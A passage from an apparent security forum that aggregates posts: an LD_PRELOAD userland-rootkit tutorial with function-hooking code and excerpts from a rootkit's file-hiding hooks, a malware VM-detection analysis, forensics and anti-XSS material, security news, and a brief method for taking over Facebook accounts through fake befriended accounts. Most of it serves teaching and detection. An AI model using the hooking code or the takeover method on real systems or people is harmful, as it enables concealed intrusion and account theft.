Movable but non-copyable types can be returned by value from factory functions: ifstream find_and_open_data_file(/* ... */); ... ifstream data_file = find_and_open_data_file(/* ... */); // No copies! In the above example, the underlying file handle is passed from object to object, as long as the source ifstream is an rvalue. At all times, there is still only one underlying file handle, and only one ifstream owns it at a time. Movable but non-copyable types can also safely be put into standard containers. If the container needs to "copy" an element internally (e.g. vector reallocation) it will move the element instead of copying it. vector<unique_ptr<base>> v1, v2; v1.push_back(unique_ptr(new derived())); // ok, moving, not copying ... v2 = v1; // Compile time error. This is not a copyable type. v2 = move(v1); // Move ok. Ownership of pointers transferred to v2. Many standard algorithms benefit from moving elements of the sequence as opposed to copying them. This not only provides better performance (like the improved std::swap implementation described above), but also allows these algorithms to operate on movable but non-copyable types. For example the following code sorts a vector<unique_ptr<T>> based on comparing the pointed-to types: struct indirect_less { template <class T> bool operator()(const T& x, const T& y) {return *x < *y;} }; ... std::vector<std::unique_ptr<A>> v; ... std::sort(v.begin(), v.end(), indirect_less()); As sort moves the unique_ptr's around, it will use swap (which no longer requires Copyability) or move construction / move assignment. Thus during the entire algorithm, the invariant that each item is owned and referenced by one and only one smart pointer is maintained. If the algorithm were to attempt a copy (say, by programming mistake) a compile time error would result. Perfect Forwarding Consider writing a generic factory function that returns a std::shared_ptr for a newly constructed generic type. Factory functions such as this are valuable for encapsulating and localizing the allocation of resources. Obviously, the factory function must accept exactly the same sets of arguments as the constructors of the type of objects constructed. Today this might be coded as: template <class T> std::shared_ptr<T> factory() // no argument version { return std::shared_ptr<T>(new T); } template <class T, class A1> std::shared_ptr<T> factory(const A1& a1) // one argument version { return std::shared_ptr<T>(new T(a1)); } // all the other versions In the interest of brevity, we will focus on just the one-parameter version. For example: std::shared_ptr<A> p = factory<A>(5); Question: What if T's constructor takes a parameter by non-const reference? In that case, we get a compile-time error as the const-qualifed argument of the factory function will not bind to the non-const parameter of T's constructor. To solve that problem, we could use non-const parameters in our factory functions: template <class T, class A1> std::shared_ptr<T> factory(A1& a1) { return std::shared_ptr<T>(new T(a1)); } This is much better. If a const-qualified type is passed to the factory, the const will be deduced into the template parameter (A1 for example) and then properly forwarded to T's constructor. Similarly, if a non-const argument is given to factory, it will be correctly forwarded to T's constructor as a non-const. Indeed, this is precisely how forwarding applications are coded today (e.g. std::bind). However, consider: std::shared_ptr<A> p = factory<A>(5); // error A* q = new A(5); // ok This example worked with our first version of factory, but now it's broken: The "5" causes the factory template argument to be deduced as int& and subsequently will not bind to the rvalue "5". Neither solution so far is right. Each breaks reasonable and common code. Question: What about overloading on every combination of AI& and const AI&? This would allow us to handle all examples, but at a cost of an exponential explosion: For our two-parameter case, this would require 4 overloads. For a three-parameter factory we would need 8 additional overloads. For a four-parameter factory we would need 16, and so on. This is not a scalable solution. Rvalue references offer a simple, scalable solution to this problem: template <class T, class A1> std::shared_ptr<T> factory(A1&& a1) { return std::shared_ptr<T>(new T(std::forward<A1>(a1))); } Now rvalue arguments can bind to the factory parameters. If the argument is const, that fact gets deduced into the factory template parameter type. Question: What is that forward function in our solution? Like move, forward is a simple standard library function used to express our intent directly and explicitly, rather than through potentially cryptic uses of references. We want to forward the argument a1, so we simply say so. Here, forward preserves the lvalue/rvalue-ness of the argument that was passed to factory. If an rvalue is passed to factory, then an rvalue will be passed to T's constructor with the help of the forward function. Similarly, if an lvalue is passed to factory, it is forwarded to T's constructor as an lvalue. The definition of forward looks like this: template <class T> struct identity { typedef T type; }; template <class T> T&& forward(typename identity<T>::type&& a) { return a; } References As one of the main goals of this paper is brevity, there are details missing from the above description. But the above content represents 95% of the knowledge with a fraction of the reading. This proposal was initially put forth in the following paper. The present article is substantially a reprint of the original proposal: Hinnant, Howard, E., Bjarne Stroustrap, and Bronek Kozicki. A Brief Introduction to Rvalue References Rvalue Reference Quick Look For further details on the motivation of move semantics, such as performance tests, details of movable but non-copyable types, and many other details please see N1377. For a very thorough treatment of the forwarding problem, please see N1385. For further applications of the rvalue reference (besides move semantics and perfect forwarding), please see N1690. For proposed wording for the language changes required to standardize the rvalue reference, please see N1952. For a summary of the impact the rvalue reference will have on the standard library, please see N1771. For proposed wording for the library changes required to take advantage of the rvalue reference, please see: N1856 N1857 N1858 N1859 N1860 N1861 N1862 For a proposal to extend the rvalue reference to the implicit object parameter (this), please see N1821. Share your opinion Have an opinion about Rvalue references? Discuss this article in the Articles Forum topic, A Brief Introduction to Rvalue References. About the Authors Howard Hinnant is the lead author of the rvalue reference proposals for the next C++ standard. He implemented and maintained the standard C++ library for Metrowerks/Motorola/Freescale from the late 90's to 2005. He is currently a senior software engineer at Apple and serving on the C++ standards committee as Library Working Group chairman. Bjarne Stroustrup is the designer and original implementor of the C++ Programming Language. He is currently the College of Engineering Endowed Chair in Computer Science at Texas A&M University. He formerly worked as the head of AT&T Lab's Large-scale Programming Research department, from its creation until late 2002. Bronek Kozicki is an experienced C++ programmer. He is a member of BSI C++ panel and author of "extending move semantics to *this" proposal (N1821, evolved to N2439). Bronek currently works for a leading investment bank in London. Sursa: A Brief Introduction to Rvalue References
  6. The magic of LD_PRELOAD for Userland Rootkits Posted on October 31, 2011 by FlUxIuS How much can you trust binaries you are running, even if you had analyzed them before compilation? With less privileges than kernel rootkits (explained in “Ring 0f Fire”), userland rootkits still represent a big threat for users. To see it, we will talk about an interesting technique to hook functions that are commonly used by programs on shared libraries. First and foremost, we will introduce quickly the use of shared libraries to explain in the second time, the need of LD_PRELOAD’s trick. After that, we will see how to apply it for rootkit, its limits and the case of its detection, that is not surprising with some anti-rootkits. Prerequisites: Basics in Linux and ELF (read the analysis part of my last article), a Linux, a survival skill in C programming language, your evil mind switched on (or just be cool!), another default song: Ez3kiel – Via continium. Here is the contents: Shared libraries, LD_PRELOAD in the wild, Make and use your own library, dlsym: Yo Hook Hook And A Bottle Of Rum!, Limitations, Userland rootkit, Jynx-Kit, Detection Shared libraries As we should know, when a program starts, it loads shared libraries and links it to the process. The linking process is done by "ld-linux-x86-64.so.X" (or "ld-linux.so.X" for 32-bits) (Remember "The Art Of ELF"?), as follows: fluxiux@handgrep:~$ readelf -l /bin/ls [...] INTERP 0x0000000000000248 0x00000000004purposes00248 0x0000000000400248 0x000000000000001c 0x000000000000001c R 1 [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2] [...] Opposed to the static compilation, that could be heavy in your hard disk, shared libraries for dynamic linked binaries are used to factorize the program, thanks to the linking that makes function calls to point to a corresponding function in the shared library. You can list shared libraries needed by the program with the command “ldd”: fluxiux@handgrep:~$ ldd /bin/ls linux-vdso.so.1 => (0x00007fff0bb9a000) libselinux.so.1 => /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007f7842edc000) librt.so.1 => /lib/x86_64-linux-gnu/librt.so.1 (0x00007f7842cd4000) libacl.so.1 => /lib/x86_64-linux-gnu/libacl.so.1 (0x00007f7842acb000) libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f7842737000) libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f7842533000) /lib64/ld-linux-x86-64.so.2 (0x00007f7843121000) libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f7842314000) libattr.so.1 => /lib/x86_64-linux-gnu/libattr.so.1 (0x00007f784210f000) Let’s try with a little code named “toto”: #include <stdio.h> main() { printf("huhu la charrue"); } Compile it now in dynamic and in static: fluxiux@handgrep:~$ gcc toto.c -o toto-dyn fluxiux@handgrep:~$ gcc -static toto.c -o toto-stat fluxiux@handgrep:~$ ls -l | grep "toto-" -rwxr-xr-x 1 fluxiux fluxiux 8426 2011-10-28 23:21 toto-dyn -rwxr-xr-x 1 fluxiux fluxiux 804327 2011-10-28 23:21 toto-stat As we can see, “toto-stat” is almost 96 times more heavy than “toto-dyn”. Why?: fluxiux@handgrep:~$ ldd toto-stat is not a dynamic executable This approach is very flexible and sophisticated because we can[1]: update libraries and still support programs that want to use older, non-backward-compatible versions of those libraries, override specific libraries or even specific functions in a library when executing a particular program, do all this while programs are running using existing libraries. Shared libraries have a special convention, which is the “soname”. “soname” have a prefix “lib”, followed by the name of the library, then “.so” and a period + a version number whenever the interface has changed (has you can see on previous listings). Now, let’s talk about the LD_PRELOAD trick. LD_PRELOAD in the wild As you can see, libraries are generally present in “/lib” folder. So if we want to patch some libraries like the “libc” one, the first idea is to modify the sources and recompile everything into a shared library with the “soname” convention. But instead of doing this, we could use a wonderful trick that Linux offers to us: LD_PRELOAD. Use your own library Suppose we want to change the “printf” function, without recompiling the whole source. To do that, we will overwrite this function in “my_printf.c” code: #define _GNU_SOURCE #include <stdio.h> int printf(const char *format, ...) { exit(153); } Now we have to compile[2] this code into a shared library as follows: fluxiux@handgrep:~$ gcc -Wall -fPIC -c -o my_printf.o my_printf.c my_printf.c: In function ‘printf’: my_printf.c:6:2: warning: implicit declaration of function ‘exit’ my_printf.c:6:2: warning: incompatible implicit declaration of built-in function ‘exit’ fluxiux@handgrep:~$ gcc -shared -fPIC -Wl,-soname -Wl,libmy_printf.so -o libmy_printf.so my_printf.o To use this library, we overwrite the environment variable “LD_PRELOAD” with the absolute path of “libmy_printf.so” library to execute our function, instead of glibc’s one: fluxiux@handgrep:~$ export LD_PRELOAD=$PWD/libmy_printf.so fluxiux@handgrep:~$ ./toto-dyn As we can see, the string “huhu la charrue” didn’t showed up, so we will trace library calls with “ltrace” to see what happen: fluxiux@handgrep:~$ ltrace ./toto-dyn __libc_start_main(0x4015f4, 1, 0x7fffa88d0908, 0x402530, 0x4025c0 <unfinished ...> printf("huhu la charrue" <unfinished ...> +++ exited (status 153) +++ Incredible! Our library has been called in first by the environment variable “LD_PRELOAD”. But if we want to alter the behavior of the function “printf” without changing its aspect for users, do we have to rewrite the whole function only modigying few lines? No! It is possible to hook a function much more easier and discretely. dlsym: Yo Hook Hook And A Bottle Of Rum! The “libdl” introduced interesting functions like: dlopen(): load a library, dlsym(): give the pointer for a specified symbol, dlclose(): unload a library. Because libraries have been loaded at process launching, we will only need to get the pointer of the symbol “printf” to use the original function. But how to do it if we have an overwritten function? We use “RTLD_NEXT” as an argument to point to the original function called before: [...] typeof(printf) *old_printf; [...] /* DO HERE SOMETHING VERY EVIL */ old_printf = dlsym(RTLD_NEXT, "printf"); [...] After that, we need to format the string passed in argument and call the original function with this formatted string (“huhu la charrue”), to be shown as expected: #define _GNU_SOURCE #include <stdio.h> #include <dlfcn.h> #include <stdlib.h> #include <stdarg.h> int printf(const char *format, ...) { va_list list; char *parg; typeof(printf) *old_printf; // format variable arguments va_start(list, format); vasprintf(&parg, format, list); va_end(list); /* DO HERE SOMETHING VERY EVIL */ // get a pointer to the function "printf" old_printf = dlsym(RTLD_NEXT, "printf"); (*old_printf)("%s", parg); // and we call the function with previous arguments free(parg); } We compile it: fluxiux@handgrep:~$ gcc -Wall -fPIC -c -o my_printf.o my_printf.c my_printf.c: In function ‘printf’: my_printf.c:21:1: warning: control reaches end of non-void function fluxiux@handgrep:~$ gcc -shared -fPIC -Wl,-soname -Wl,libmy_printf.so -ldl -o libmy_printf.so my_printf.o fluxiux@handgrep:~$ export LD_PRELOAD=$PWD/libmy_printf.so And execute it: fluxiux@handgrep:~$ ./toto-dyn huhu la charrue Wonderful! A user cannot expect that something evil is going on, when executing his own program now. But there are some limitations using the LD_PRELOAD trick. Limitations This trick is very good but limited. Indeed, if you try with the static version of “toto” (toto-stat), the kernel will just load each segment to the specified virtual address, then jump to the entry-point. It means that there is no linking process done by the program interpreter. Moreover, if the SUID or SGID bit is set to “1?, the LD_PRELOAd will not work for some security reasons (Too bad!). For more informations about “LD_PRELOAD”, I suggest you to read the article of Etienne Duble[3] (in French), that inspirited me a lot to make this post. Userland rootkit Jynx-Kit About 2 weeks ago, a new userland rootkit[4] have been introduced. This rootkit came with an automated bash script to install it easily and is undetected by rkhunter and chkrootkit. To know more about that, we will analyze it. The interesting part is in “ld_poison.c”, where fourteen functions are hooked: [...] old_fxstat = dlsym(RTLD_NEXT, "__fxstat"); old_fxstat64 = dlsym(RTLD_NEXT, "__fxstat64"); old_lxstat = dlsym(RTLD_NEXT, "__lxstat"); old_lxstat64 = dlsym(RTLD_NEXT, "__lxstat64"); old_open = dlsym(RTLD_NEXT,"open"); old_rmdir = dlsym(RTLD_NEXT,"rmdir"); old_unlink = dlsym(RTLD_NEXT,"unlink"); old_unlinkat = dlsym(RTLD_NEXT,"unlinkat"); old_xstat = dlsym(RTLD_NEXT, "__xstat"); old_xstat64 = dlsym(RTLD_NEXT, "__xstat64"); old_fdopendir = dlsym(RTLD_NEXT, "fdopendir"); old_opendir = dlsym(RTLD_NEXT, "opendir"); old_readdir = dlsym(RTLD_NEXT, "readdir"); old_readdir64 = dlsym(RTLD_NEXT, "readdir64"); [...] Randomly, have look to the ”open” function. As you can see a “__xstat” is performed to get file informations: [...] struct stat s_fstat; [...] old_xstat(_STAT_VER, pathname, &s_fstat); [...] After that, a comparison informations like Group ID, path, and “ld.so.preload” that we want to hide. If these informations match, the function doesn’t return any result: [...] if(s_fstat.st_gid == MAGIC_GID || (strstr(pathname, MAGIC_DIR) != NULL) || (strstr(pathname, CONFIG_FILE) != NULL)) { errno = ENOENT; return -1; } [...] It is organized like this in every functions, and people are not supposed to notice any suspicious file or activity (like the back connect shell). But what about detection? Detection Surprising (or not), but this rootkit is undetected by rkhunter and chkrootkit. The reason is that these two anti-rootkit check for signs, and as we should know, this is not the best to do. Indeed, for example, just clean the “LD_PRELOAD” variable and generate a “sha1sum” of “toto”, as follows: fluxiux@handgrep:~$ sha1sum toto-dyn a659c72ea5d29c9a6406f88f0ad2c1a5729b4cfa toto-dyn fluxiux@handgrep:~$ sha1sum toto-dyn > toto-dyn.sha1 And then set the “LD_PRELOAD” variable and check if the sum is correct: fluxiux@handgrep:~$ export LD_PRELOAD=$PWD/libmy_printf.so fluxiux@handgrep:~$ sha1sum -c toto-dyn.sha1 toto-dyn: OK IT… IS… CORRECT???! Exactly! We didn’t modified anything in the ELF file, so the checksum should be the same, and it is. If anti-rootkit like rkhunter work like that, the detection must fail. Other techniques are based on suspicious files, signs and port binding detection like in “chkrootkit”, but they failed too, because this type of rootkit is very flexible, and in Jynx we have a sort of port knocking to open the remote shell for our host. To avoid these rootkits, you could check for any suspicious library specified in “LD_PRELOAD” or “/etc/ld.so.preload”. We know also that “dlsym” can be used to call the original function while altering it: $ strace ./bin/ls [...] open("/home/fluxiux/blabla/Jynx-Kit/ld_poison.so", O_RDONLY) = 3 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240\n\0\0\0\0\0\0"..., 832) = 832 fstat(3, {st_mode=S_IFREG|0755, st_size=17641, ...}) = 0 mmap(NULL, 2109656, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f5e1a586000 mprotect(0x7f5e1a589000, 2093056, PROT_NONE) = 0 mmap(0x7f5e1a788000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7f5e1a788000 close(3) [...] open("/lib/x86_64-linux-gnu/libdl.so.2", O_RDONLY) = 3 [...] And disassembling “ld_poison.so” file, we could see that there are many substitutions in functions, that could hide malicious files or activities. Looking for strings in the binaries, when it is not packed, could provide us some interesting clues (but get in minds also that packing is suspicious sometimes): fluxiux@handgrep:~/blabla/Jynx-Kit$ strings ld_poison.so [...] libdl.so.2 [...] dlsym fstat [...] lstat hooked. ld.so.preload xochi <-- sounds familiar [...] /proc/%s <-- hmmm... strange! [...] A rootkit as Jynx-kit, proves that signing detection is just a hopeless way to protect us against technologies like rootkits. If you want to make it right, base your detection on heuristics. To finish, there is also some interesting forensic tools that compare results with many techniques (“/bin/ps” output against “/proc”, “procfs” walking and “syscall”). Indeed, Security by default has provided a special analysis on Jynx-kit[5] that made me discover Unhide[6], that checks if there are no hidden processes and opened ports (brute-forcing all available TCP/UDP ports). References & Acknowledgements [1] Shared libraries – http://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html [2] Static, Shared Dynamic and Loadable Linux Libraries – http://www.yolinux.com/TUTORIALS/LibraryArchives-StaticAndDynamic.html [3] (French) Le monde merveilleux de LD_PRELOAD – Open Silicium Magazine #4 [4] Jynx-Kit LD_PRELOAD Rootkit Release – http://forum.blackhatacademy.org/viewtopic.php?id=186 [5] Analisis de Jynx (Linux Rootkit) – http://www.securitybydefault.com/2011/10/analisis-de-jynx-linux-rootkit.html [6] Unhide – http://www.unhide-forensics.info Sursa: http://fluxius.handgrep.se/2011/10/31/the-magic-of-ld_preload-for-userland-rootkits/
  7. How To Use Thc-Hydra Description: In this video I show how to use the brute forcer hydra. Download: THC-HYDRA v7.1 Released - Insecure Stuff If u have any Problem then Contact me on Twitter: Twitter Video: http://www.securitytube.net/video/2381 http://www.youtube.com/watch?v=kzJFPduiIsI
  8. 'Nitro' Cyber-Spying Campaign Stole Data From Chemical, Defense Companies By: Fahmida Y. Rashid 2011-10-31 Cyber-attackers targeted chemical and defense companies over a two month long campaign to steal sensitive information by infecting systems with the PoisonIvy Trojan. Symantec has identified a cyber-spying campaign to steal information from chemical and defense companies around the world. Dubbed 'Nitro' by Symantec, the campaign began last April, according to a whitepaper released by Symantec Oct. 31. Cyber-attackers originally targeted human rights organizations and the auto industry before moving on to the chemical industry in July. At least 48 companies are believed to have been targeted across various industry verticals, including 29 companies involved in research and development of chemical compounds and companies that develop materials for military vehicles. The other 19 were in other sectors, including defense. A dozen victims were based in the United States, five were in the United Kingdom, and others were in Denmark, Italy, the Netherlands and Japan. Even so, the largest percentage of affected systems was in the United States and Bangladesh. "The purpose of the attacks appears to be industrial espionage, collecting intellectual property for competitive advantage," wrote Eric Chien and Gavin O'Gorman in the whitepaper. The campaign relied on email with the well-known off-the-shelf Trojan called PoisonIvy attached to the message. One set of emails was sent to targeted recipients within the organization pretending to be meeting invitations from known business partners and the other set was sent to a larger group of victims and masqueraded as a security update, according to Symantec. Once on the system, PoisonIvy opened a backdoor and contacted a remote command and control server, and transmitted the IP address, names of all other computers in the workgroup or domain, and a dump of Windows cashed password hashes. “By using access to additional computers through the currently logged on user or cracked passwords through dumped hashes, the attackers then began traversing the network infecting additional computers,” Symantec researchers wrote. The attackers' primary goal appeared to be obtaining domain administrator credentials and gaining access to a system where intellectual property was stored, according to Symantec. The attackers' behavior varied slightly with each compromise, but once the intellectual property was found, they copied the contents to a handful of internal systems that have been designated as a staging area. The data was then uploaded to a remote server, which was traced to a virtual private server (VPS) in the United States and owned by a “20-something male located in the Hebei region in China,” according to Symantec. The technique was similar to what attackers allegedly did during the attack on Japan's largest defense contractor Mitsubishi Heavy Industries in August, but Symantec declined to identify any of the affected Japanese companies. Attackers are increasingly launching reconnaissance activities to ferret out sensitive information before extracting them from the organizations, Noa Bar-Yosef, a senior security strategist at Imperva, told eWEEK in an earlier interview. Developed by a Chinese coder, PoisonIvy is widely available on the Internet and has its own Website. It has been implicated in recent attacks, including the campaign which compromised RSA Security and allowed thieves to steal information related to the SecurID authentication technology. Symantec said other groups targeted some of the same chemical companies during the time period by sending malicious PDF and DOC files which exploit vulnerabilities to download Sogu, a backdoor Trojan. It was "difficult" to determine if the Nitro gang with PoisonIvy was related to the group using Sogu, but "unlikely" because the attack methods were so different, according to Symantec. Sursa: http://www.eweek.com/c/a/Security/Nitro-CyberSpying-Campaign-Stole-Data-From-Chemical-Defense-Companies-863610/ Pff, mi-au gresit numele
  9. Android Reverse Engineering VM The virtual machine is available here : http://redmine.honeynet.org/Android.tar.gz You must extract the virtual machine : tar xvzf Android.tar.gz and load it with VirtualBox by adding a new virtual machine. Softwares Androguard Android sdk/ndk APKInspector Apktool Axmlprinter Ded Dex2jar DroidBox Jad Smali/Baksmali You would like your sofware in ARE ? Please report an issue . Login/Password The login is : android And the password is : android Sursa: http://redmine.honeynet.org/projects/are/wiki
  10. Volatility 2.0 - Advanced Memory Forensics [With Video Demonstration] POSTED BY THN REPORTER ON 10/30/2011 03:10:00 AM The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples. The extraction techniques are performed completely independent of the system being investigated but offer unprecedented visibilty into the runtime state of the system. The framework is intended to introduce people to the techniques and complexities associated with extracting digital artifacts from volatile memory samples and provide a platform for further work into this exciting area of research. The Volatility Framework demonstrates our committment to and belief in the importance of open source digital investigation tools . Volatile Systems is committed to the belief that the technical procedures used to extract digital evidence should be open to peer analysis and review. We also believe this is in the best interest of the digital investigation community, as it helps increase the communal knowledge about systems we are forced to investigate. Similarly, we do not believe the availability of these tools should be restricted and therefore encourage people to modify, extend, and make derivative works, as permitted by the GPL. Capabilities The Volatility Framework currently provides the following extraction capabilities for memory samples Image date and time: Running processes Open network sockets Open network connections DLLs loaded for each process Open files for each process Open registry handles for each process A process' addressable memory OS kernel modules Mapping physical offsets to virtual addresses (strings to process) Virtual Address Descriptor information Scanning examples: processes, threads, sockets, connections,modules Extract executables from memory samples Transparently supports a variety of sample formats (ie, Crash dump, Hibernation, DD) Automated conversion between formats Video Demonstration: This video shows grabbing the windows NTLM passwords from a memory dump and then using John the Ripper to crack them. Video: http://www.youtube.com/watch?v=YO1mlynbsmc Download: https://www.volatilesystems.com/default/volatility Sursa: Volatility 2.0 - Advanced Memory Forensics [With Video Demonstration] ~ THN : The Hacker News
  11. A practical solution of token based attributes to prevent XSS. Can you break #JSLR? JSLR uses randomized attributes and tags to prevent an attacker injecting malicious content. The HTML is parsed via the DOM before it's rendered and only legitimate attributes make it through. It's possible to prevent DOM based injection inside allowed script and attributes by randomizing quotes. jslr.js: window.JSLR=function(id, singleQuote, doubleQuote) { document.write('<plaintext id="JSLRElement" />'); document.addEventListener('DOMContentLoaded', function() { var JSLRElement, JSLRContents, html, i, j, k, re, pn, len, attrNamesToRemove = [], attrToAdd = [], allowedTag = false, script, text; JSLRElement = document.getElementById('JSLRElement'); JSLRContents = JSLRElement.textContent?JSLRElement.textContent:JSLRElement.innerHTML; html = document.implementation.createHTMLDocument(''); JSLRElement.parentNode.innerHTML=''; html.body.innerHTML = JSLRContents; j = html.getElementsByTagName('*'); for (i=0;i<j.length;i++) { tagName = j[i].tagName; if(!tagName) { try {j[i].removeNode(true);} catch(e){} try {j[i].parentNode.removeChild(j[i]);}catch(e){} } if(/^(?:object|embed|script|textarea|button|style|svg)$/i.test(tagName) && !/^(?:canvas|form|optgroup|legend|fieldset|label|option|select|input|audio|aside|article|a|abbr|acronym|address|area|b|bdo|big|br|canvas|caption|center|cite|code|col|dd|del|dfn|dir|div|dl|dt|em|font|h[1-6]|hr|i|img|ins|kbd|li|map|ol|p|pre|q|s|samp|small|span|strike|strong|sub|sup|table|tbody|td|tfoot|th|thead|tr|tt|u|ul|blockquote|image|video|xmp)$/i.test(tagName)) { allowedTag = false; try { for(k=0;k<j[i].attributes.length;k++) { re = new RegExp('^'+id + '_$'); if(re.test(j[i].attributes[k].name)) { allowedTag = true; } } } catch(e){} if(allowedTag) { continue; } try {j[i].removeNode(true);} catch(e){} try {j[i].parentNode.removeChild(j[i]);}catch(e){} } try { attrNamesToRemove = []; attrToAdd = []; for(k=0;k<j[i].attributes.length;k++) { re = new RegExp('^'+id + '_'); if(!re.test(j[i].attributes[k].name)) { attrNamesToRemove.push(j[i].attributes[k].name); } else { attrToAdd.push({name:(j[i].attributes[k].name+'').replace(re, ''), value: j[i].getAttribute(j[i].attributes[k].name)+''}); attrNamesToRemove.push(j[i].attributes[k].name); } } for(k=0;k<attrToAdd.length;k++) { if(/^on/i.test(attrToAdd[k].name)) { j[i][attrToAdd[k].name] = new Function(attrToAdd[k].value); } else { j[i].setAttribute(attrToAdd[k].name, attrToAdd[k].value); } if(j[i].protocol) { if(!/^https?:?/i.test(j[i].protocol) && !j[i].getAttribute(id + '_javascriptprotocol')) { j[i].setAttribute(attrToAdd[k].name,'#'); } } } for(k=0;k<attrNamesToRemove.length;k++) { j[i].removeAttribute(attrNamesToRemove[k]); } } catch(e){} } j = html.getElementsByTagName('*'); for (i=0;i<j.length;i++) { if(/^script$/i.test(j[i].tagName)) { script = document.createElement('script'); if(j[i].type) { script.type = j[i].type; } if(j[i].src) { script.src = j[i].src; } if(j[i].text) { text = j[i].text; text = text.replace(/['"]/g,''); text = text.replace(new RegExp('(?:'+singleQuote+')','g'),"'"); text = text.replace(new RegExp('(?:'+doubleQuote+')','g'),"'"); script.text = text; } document.getElementsByTagName('head')[0].appendChild(script); } } pn=document.body.parentNode; pn.removeChild(document.body); pn.appendChild(html.body); html = null; }, false); return null; }; Test: http://www.businessinfo.co.uk/labs/jslr/jslr.php
  12. Tu sa ne aduci shaorma de acolo de la tine
  13. TDL4 tricks for detecting Virtual Machine 25/10/2011 Introduction I received several mail asking me, if I was still active on my blog. And the answer is YES!, i'm just (very) busy by my internship, and some personal projetcs. So today I give you some news. TDL4 I'm sorry for my english readers (if there are), but my draft article about all reverse stuff from tdl4 is written in French. But you can use Google Translate ! So here is the link to the article. Be careful this is an oldschool version ( 0.3 ), I'm currently studying new version. TDL4 (New version) And we will start with a tricks for detecting Virtual Machine, apparently the new loader do this check, instead of the loader from my article. Maybe for you it will not be new, but for me it is, I'm a beginner in malware analysis. It will use WQL language to query Windows Management Instrumentation. I will not bore you with disassembly code, but with a picture, that will show you a little script that I wrote for defeating unicode string obfuscation : And source code of idc script (I'm maybe doing it wrong, but it's my first) : #include <idc.idc> static String(ea) { auto s,b,i; s = ""; i = 0; while(i < 2) { b = Byte(ea); if ( { s = s + form("%c", ; ea = ea + 2; } i++; } return s; } static main() { auto ea; auto op; auto str; auto s; ea = SelStart(); str = ""; while (ea < SelEnd()) { if(GetMnem(ea) != "mov") break; if (GetOpType(ea, 1) == 1) break; s = String(ea + 7); str = str + s; ea = FindCode(ea, SEARCH_DOWN | SEARCH_NEXT); } Message("%s\n", str); } So with this script I was able to see all this interesting stuff : Win32_BIOS Win32_Process Win32_DiskDrive Win32_Processor Win32_SCSIController Name Model Manufacturer Xen QEMU Bochs Red Hat Citrix VMware Virtual HDVBOX CaptureClient.exe SELECT * FROM %s WHERE %s LIKE "%%%s%%" SELECT * FROM %s WHERE %s = "%s" First it will gather all the information about your pc and send this to a C&C. And after for example, it will check if in process list there is "CaptureClient.exe", or execute the request "SELECT * FROM Win32_DiskDevice WHERE Manufacturer = "VMware", etc... This is how they can detect that you are in virtualized or emulated environment. I didn't know how WQL work, so I decided to develop someshit : #include <windows.h> #include <objbase.h> #include <atlbase.h> #include <iostream> #include <wbemidl.h> #include <comutil.h> int main(void) { HRESULT hr; hr = CoInitializeEx( NULL, COINIT_MULTITHREADED ); if (hr < 0) { std::cerr << "[-] COM initialization failed" << std::endl; return (-1); } hr = CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, NULL ); if (hr < 0) { std::cerr << "[-] Security initialization failed" << std::endl; return (-1); } CComPtr<IWbemLocator> locator; hr = CoCreateInstance(CLSID_WbemAdministrativeLocator, NULL, CLSCTX_INPROC_SERVER, IID_IWbemLocator, reinterpret_cast< void** >( &locator )); if (hr < 0) { std::cerr << "[-] Instantiation of IWbemLocator failed" << std::endl; return (-1); } CComPtr<IWbemServices> service; hr = locator->ConnectServer(L"root\\cimv2", NULL, NULL, NULL, WBEM_FLAG_CONNECT_USE_MAX_WAIT, NULL, NULL, &service); CComPtr< IEnumWbemClassObject > enumerator; hr = service->ExecQuery( L"WQL", L"SELECT * FROM Win32_Process", WBEM_FLAG_FORWARD_ONLY, NULL, &enumerator ); //hr = service->ExecQuery( L"WQL", L"SELECT * FROM Win32_DiskDrive WHERE Model LIKE \"%VMware%\"", WBEM_FLAG_FORWARD_ONLY, NULL, &enumerator ); if (hr < 0) { std::cerr << "[-] ExecQuey() Failed" << std::endl; return (-1); } CComPtr< IWbemClassObject > processor = NULL; ULONG retcnt; hr = enumerator->Next(WBEM_INFINITE, 1L, reinterpret_cast<IWbemClassObject**>( &processor ), &retcnt); while ( SUCCEEDED(hr) && retcnt > 0) { if ( retcnt > 0 ) { _variant_t var_val; hr = processor->Get( L"Name", 0, &var_val, NULL, NULL ); if (hr >= 0) { _bstr_t str = var_val; std::cout << "[+] Name: " << str << std::endl; } else { std::cerr << "[-] IWbemClassObject::Get failed" << std::endl; //result = -1; } hr = enumerator->Next( WBEM_INFINITE, 1L, reinterpret_cast<IWbemClassObject**>( &processor ), &retcnt ); } else { std::cout << "[-] Enumeration empty" << std::endl; } } } That's all for today :]. Sursa: w4kfu's bl0g
  14. Facebook "Trusted friends" Security Feature Easily Exploitable POSTED BY THN REPORTER ON 10/31/2011 12:10:00 AM Last week Facebook announced that in one day 600,000 accounts possibly get hacked. Another possible solution for Facebook to combat security issues is to find 3 to 5 "Trusted friends". Facebook will be adding two new security features that will allow users to regain control of their account if it gets hijacked. In Facebook's case, the keys are codes, and the user can choose from three to five "Trusted friends" who are then provided with a code. If you ever get locked out of your account (and you can't access your email to follow the link after resetting your Facebook password), you gather all the codes and use them to gain access to it again. Yet This method is used by hackers to hack most of the Facebook account using little bit of Social Engineering from last 5-6 Months according to me. Let us know, how this works... How its Exploitable: This Exploit is 90% Successful on the victims who add friends without knowing them or just for increasing the number of Friends. This method to hack a Facebook Account only works if 3 trusted friends agree to give you the security code ! Another Idea, Why not Create 3 fake accounts and send Friend Request to Victim. Once your 3 Fake Accounts become friends with your victims facebook account, you can select those 3 Accounts to get the Security Code and Reset the password of Victim. Here a Complete Demonstration of Hacking Method on HackersOnlineClub. Other Serious Facebook Vulnerability in Last Week Last Week Nathan Power from SecurityPentest has discovered new Facebook Vulnerability, that can easily attach 